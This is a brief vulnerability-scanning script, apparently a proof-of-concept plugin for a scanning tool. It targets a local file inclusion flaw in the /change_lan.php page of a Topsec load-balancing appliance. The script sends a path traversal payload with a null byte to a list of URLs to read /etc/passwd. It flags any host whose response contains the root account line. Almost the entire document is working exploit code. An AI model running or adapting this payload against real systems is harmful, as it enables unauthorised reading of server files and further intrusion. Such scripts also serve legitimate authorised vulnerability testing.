#request urls = array
#define payload = /change_lan.php?LanID=../../../../../../../../../etc/passwd%00
#define bug = root:x:0:0
#define info = /change_lan.php?LanID=../../../../../../../../../etc/passwd%00|存在天融信负载均衡系统 /change_lan.php 本地文件包含漏洞

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
